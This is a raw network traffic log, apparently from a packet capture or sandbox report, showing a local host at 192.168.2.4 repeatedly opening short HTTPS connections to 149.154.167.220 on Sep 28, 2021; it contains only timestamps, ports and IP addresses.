Sep 28, 2021 07:58:59.122380018 CEST	443	49927	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:59.122446060 CEST	49927	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:59.123395920 CEST	49927	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:59.125061989 CEST	49928	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:59.125096083 CEST	443	49928	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:59.125170946 CEST	49928	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:59.125653028 CEST	49928	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:59.125668049 CEST	443	49928	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:59.181196928 CEST	443	49928	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:59.185070992 CEST	49928	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:59.185089111 CEST	443	49928	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:59.185251951 CEST	49928	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:59.185259104 CEST	443	49928	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:59.471009016 CEST	443	49928	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:59.471085072 CEST	443	49928	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:59.471148968 CEST	49928	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:59.472178936 CEST	49928	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:59.474417925 CEST	49929	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:59.474450111 CEST	443	49929	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:59.474533081 CEST	49929	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:59.475050926 CEST	49929	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:59.475071907 CEST	443	49929	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:59.531363964 CEST	443	49929	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:59.536587000 CEST	49929	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:59.536621094 CEST	443	49929	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:59.536763906 CEST	49929	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:59.536775112 CEST	443	49929	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:59.652281046 CEST	443	49929	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:59.652354956 CEST	443	49929	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:59.652405024 CEST	49929	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:59.653460026 CEST	49929	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:59.673381090 CEST	49930	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:59.673415899 CEST	443	49930	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:59.673512936 CEST	49930	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:59.674050093 CEST	49930	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:59.674060106 CEST	443	49930	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:59.729846954 CEST	443	49930	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:59.733877897 CEST	49930	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:59.733896971 CEST	443	49930	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:59.734289885 CEST	49930	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:59.734296083 CEST	443	49930	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:59.877902031 CEST	443	49930	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:59.877973080 CEST	443	49930	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:59.878038883 CEST	49930	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:59.879223108 CEST	49930	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:59.881232977 CEST	49931	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:59.881284952 CEST	443	49931	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:59.881370068 CEST	49931	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:59.882005930 CEST	49931	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:59.882029057 CEST	443	49931	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:59.937768936 CEST	443	49931	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:59.942006111 CEST	49931	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:59.942049980 CEST	443	49931	149.154.167.220	192.168.2.4
Sep 28, 2021 07:58:59.942215919 CEST	49931	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:58:59.942223072 CEST	443	49931	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:00.049293995 CEST	443	49931	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:00.049369097 CEST	443	49931	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:00.049454927 CEST	49931	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:00.050487041 CEST	49931	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:00.053440094 CEST	49932	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:00.053472996 CEST	443	49932	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:00.053589106 CEST	49932	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:00.054173946 CEST	49932	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:00.054186106 CEST	443	49932	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:00.113914013 CEST	443	49932	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:00.117439985 CEST	49932	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:00.117459059 CEST	443	49932	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:00.117712975 CEST	49932	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:00.117717028 CEST	443	49932	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:00.221998930 CEST	443	49932	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:00.222078085 CEST	443	49932	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:00.222127914 CEST	49932	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:00.223582029 CEST	49932	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:00.225410938 CEST	49933	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:00.225475073 CEST	443	49933	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:00.225553989 CEST	49933	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:00.226128101 CEST	49933	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:00.226150990 CEST	443	49933	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:00.281929970 CEST	443	49933	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:00.284492016 CEST	49933	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:00.284533978 CEST	443	49933	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:00.284619093 CEST	49933	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:00.284630060 CEST	443	49933	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:00.448940992 CEST	443	49933	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:00.449040890 CEST	443	49933	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:00.449116945 CEST	49933	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:00.450576067 CEST	49933	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:00.453810930 CEST	49934	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:00.453851938 CEST	443	49934	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:00.453944921 CEST	49934	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:00.454596043 CEST	49934	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:00.454615116 CEST	443	49934	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:00.511499882 CEST	443	49934	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:00.517004013 CEST	49934	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:00.517035961 CEST	443	49934	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:00.517219067 CEST	49934	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:00.517226934 CEST	443	49934	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:00.629606009 CEST	443	49934	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:00.629687071 CEST	443	49934	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:00.629751921 CEST	49934	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:00.630738020 CEST	49934	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:00.632570982 CEST	49935	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:00.632602930 CEST	443	49935	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:00.632711887 CEST	49935	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:00.633308887 CEST	49935	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:00.633322001 CEST	443	49935	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:00.693512917 CEST	443	49935	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:00.697539091 CEST	49935	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:00.701219082 CEST	443	49935	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:00.701648951 CEST	49935	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:00.701672077 CEST	443	49935	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:00.824893951 CEST	443	49935	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:00.824982882 CEST	443	49935	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:00.825063944 CEST	49935	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:00.826031923 CEST	49935	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:00.827704906 CEST	49936	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:00.827769041 CEST	443	49936	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:00.827862978 CEST	49936	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:00.828311920 CEST	49936	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:00.828335047 CEST	443	49936	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:00.898582935 CEST	443	49936	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:00.902379990 CEST	49936	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:00.902405024 CEST	443	49936	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:00.902602911 CEST	49936	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:00.902611017 CEST	443	49936	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:01.027225018 CEST	443	49936	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:01.027313948 CEST	443	49936	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:01.027393103 CEST	49936	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:01.028534889 CEST	49936	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:01.030482054 CEST	49937	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:01.030513048 CEST	443	49937	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:01.030621052 CEST	49937	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:01.031192064 CEST	49937	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:01.031202078 CEST	443	49937	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:01.088824987 CEST	443	49937	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:01.092772961 CEST	49937	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:01.092796087 CEST	443	49937	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:01.092947006 CEST	49937	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:01.092956066 CEST	443	49937	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:01.205787897 CEST	443	49937	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:01.205993891 CEST	443	49937	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:01.206101894 CEST	49937	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:01.207129955 CEST	49937	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:01.209011078 CEST	49938	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:01.209043980 CEST	443	49938	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:01.209192991 CEST	49938	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:01.209744930 CEST	49938	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:01.209754944 CEST	443	49938	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:01.266436100 CEST	443	49938	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:01.270446062 CEST	49938	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:01.270467997 CEST	443	49938	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:01.270554066 CEST	49938	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:01.270561934 CEST	443	49938	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:01.381822109 CEST	443	49938	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:01.381912947 CEST	443	49938	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:01.382046938 CEST	49938	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:01.383200884 CEST	49938	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:01.385191917 CEST	49939	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:01.385238886 CEST	443	49939	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:01.385411024 CEST	49939	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:01.385978937 CEST	49939	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:01.386002064 CEST	443	49939	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:01.442219973 CEST	443	49939	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:01.446553946 CEST	49939	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:01.446602106 CEST	443	49939	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:01.446851969 CEST	49939	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:01.446865082 CEST	443	49939	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:01.575730085 CEST	443	49939	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:01.575800896 CEST	443	49939	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:01.575942993 CEST	49939	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:01.577012062 CEST	49939	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:01.578803062 CEST	49940	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:01.578841925 CEST	443	49940	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:01.578983068 CEST	49940	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:01.579585075 CEST	49940	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:01.579598904 CEST	443	49940	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:01.635459900 CEST	443	49940	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:01.641925097 CEST	49940	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:01.641954899 CEST	443	49940	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:01.642347097 CEST	49940	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:01.642354965 CEST	443	49940	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:01.755325079 CEST	443	49940	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:01.755402088 CEST	443	49940	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:01.755549908 CEST	49940	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:01.756673098 CEST	49940	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:01.758634090 CEST	49941	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:01.758682013 CEST	443	49941	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:01.758908033 CEST	49941	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:01.759466887 CEST	49941	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:01.759490013 CEST	443	49941	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:01.814858913 CEST	443	49941	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:01.820682049 CEST	49941	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:01.820727110 CEST	443	49941	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:01.820843935 CEST	49941	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:01.820852995 CEST	443	49941	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:01.976030111 CEST	443	49941	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:01.976103067 CEST	443	49941	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:01.976268053 CEST	49941	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:01.977382898 CEST	49941	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:01.979274035 CEST	49942	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:01.979315996 CEST	443	49942	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:01.979423046 CEST	49942	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:01.979943991 CEST	49942	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:01.979957104 CEST	443	49942	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:02.036936998 CEST	443	49942	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:02.041980982 CEST	49942	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:02.042016029 CEST	443	49942	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:02.042351007 CEST	49942	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:02.042366028 CEST	443	49942	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:02.156786919 CEST	443	49942	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:02.156873941 CEST	443	49942	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:02.157016039 CEST	49942	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:02.158075094 CEST	49942	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:02.159815073 CEST	49943	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:02.159857035 CEST	443	49943	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:02.159960985 CEST	49943	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:02.161580086 CEST	49943	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:02.161597967 CEST	443	49943	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:02.217691898 CEST	443	49943	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:02.221808910 CEST	49943	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:02.221842051 CEST	443	49943	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:02.222165108 CEST	49943	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:02.222177982 CEST	443	49943	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:02.324563026 CEST	443	49943	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:02.324666977 CEST	443	49943	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:02.324773073 CEST	49943	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:02.325779915 CEST	49943	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:02.341188908 CEST	49944	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:02.341233015 CEST	443	49944	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:02.342040062 CEST	49944	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:02.342636108 CEST	49944	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:02.342658043 CEST	443	49944	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:02.399405956 CEST	443	49944	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:02.403495073 CEST	49944	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:02.403527021 CEST	443	49944	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:02.403657913 CEST	49944	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:02.403666973 CEST	443	49944	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:02.544713974 CEST	443	49944	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:02.544833899 CEST	443	49944	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:02.545516014 CEST	49944	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:02.546168089 CEST	49944	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:02.548444986 CEST	49948	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:02.548485041 CEST	443	49948	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:02.548582077 CEST	49948	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:02.549216986 CEST	49948	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:02.549235106 CEST	443	49948	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:02.605413914 CEST	443	49948	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:02.609096050 CEST	49948	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:02.609146118 CEST	443	49948	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:02.609395027 CEST	49948	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:02.609400988 CEST	443	49948	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:02.715065002 CEST	443	49948	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:02.715173960 CEST	443	49948	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:02.715255976 CEST	49948	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:02.716161013 CEST	49948	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:02.717585087 CEST	49950	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:02.717624903 CEST	443	49950	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:02.717710018 CEST	49950	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:02.718249083 CEST	49950	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:02.718266964 CEST	443	49950	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:02.776556969 CEST	443	49950	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:02.779472113 CEST	49950	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:02.779504061 CEST	443	49950	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:02.779592037 CEST	49950	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:02.779601097 CEST	443	49950	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:02.886146069 CEST	443	49950	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:02.886234999 CEST	443	49950	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:02.886301994 CEST	49950	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:02.887088060 CEST	49950	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:02.888425112 CEST	49951	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:02.888493061 CEST	443	49951	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:02.888607979 CEST	49951	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:02.889008999 CEST	49951	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:02.889025927 CEST	443	49951	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:02.946393013 CEST	443	49951	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:02.949126959 CEST	49951	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:02.949183941 CEST	443	49951	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:02.949290991 CEST	49951	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:02.949301004 CEST	443	49951	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:03.119373083 CEST	443	49951	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:03.119446993 CEST	443	49951	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:03.119499922 CEST	49951	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:03.120639086 CEST	49951	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:03.122509003 CEST	49953	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:03.122558117 CEST	443	49953	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:03.122625113 CEST	49953	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:03.123172998 CEST	49953	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:03.123194933 CEST	443	49953	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:03.179315090 CEST	443	49953	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:03.183352947 CEST	49953	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:03.183402061 CEST	443	49953	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:03.183496952 CEST	49953	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:03.183506012 CEST	443	49953	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:03.542089939 CEST	443	49953	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:03.542180061 CEST	443	49953	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:03.544373989 CEST	49953	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:03.546760082 CEST	49953	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:03.547765970 CEST	49956	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:03.547833920 CEST	443	49956	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:03.548737049 CEST	49956	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:03.548808098 CEST	49956	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:03.548818111 CEST	443	49956	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:03.612108946 CEST	443	49956	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:03.620003939 CEST	49956	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:03.620027065 CEST	443	49956	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:03.620471954 CEST	49956	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:03.620490074 CEST	443	49956	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:03.792263985 CEST	443	49956	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:03.792352915 CEST	443	49956	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:03.793613911 CEST	49956	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:03.793642998 CEST	49956	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:03.796468973 CEST	49958	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:03.796515942 CEST	443	49958	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:03.797950029 CEST	49958	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:03.798011065 CEST	49958	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:03.798027039 CEST	443	49958	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:03.864531994 CEST	443	49958	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:03.869030952 CEST	49958	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:03.869074106 CEST	443	49958	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:03.869277954 CEST	49958	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:03.869294882 CEST	443	49958	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:03.987191916 CEST	443	49958	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:03.987267017 CEST	443	49958	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:03.987313986 CEST	49958	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:03.990602016 CEST	49958	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:03.992034912 CEST	49960	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:03.992085934 CEST	443	49960	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:03.993412018 CEST	49960	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:03.995099068 CEST	49960	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:03.995146036 CEST	443	49960	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:04.063880920 CEST	443	49960	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:04.070318937 CEST	49960	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:04.070338964 CEST	443	49960	149.154.167.220	192.168.2.4
